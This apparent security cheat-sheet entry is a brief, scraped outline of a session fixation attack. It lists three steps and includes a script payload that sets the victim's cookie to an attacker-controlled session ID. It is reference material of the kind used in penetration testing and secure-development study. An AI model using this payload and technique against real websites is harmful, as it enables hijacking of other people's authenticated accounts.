Session fixation
Session Fixation
Exploitation
1. Attacker Logins Website to Get the Session
Cookie: sessid=abcdef2. Attacker Sends the Session Value to Victim
<script>document.cookie = ATTACKERS_SESSION_ID</script>
3. Victim Logins with Attacker’s Session
References
Last updated